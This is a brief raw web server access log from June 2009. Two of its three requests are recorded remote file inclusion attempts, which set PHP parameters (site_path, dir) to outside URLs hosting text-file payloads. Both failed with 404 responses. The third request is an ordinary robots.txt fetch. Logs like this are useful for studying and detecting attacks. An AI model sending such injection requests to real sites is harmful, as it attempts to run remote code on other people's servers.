116.36.213.166 - - [07/Jun/2009:07:02:48 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 237
77.221.130.2 - - [07/Jun/2009:07:02:51 -0400] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://www.wdiet.co.kr//skin_shop/.../cms/idf.txt??? HTTP/1.1" 404 249
65.55.4.146 - - [07/Jun/2009:07:03:11 -0400] "GET /robots.txt HTTP/1.1" 404 216
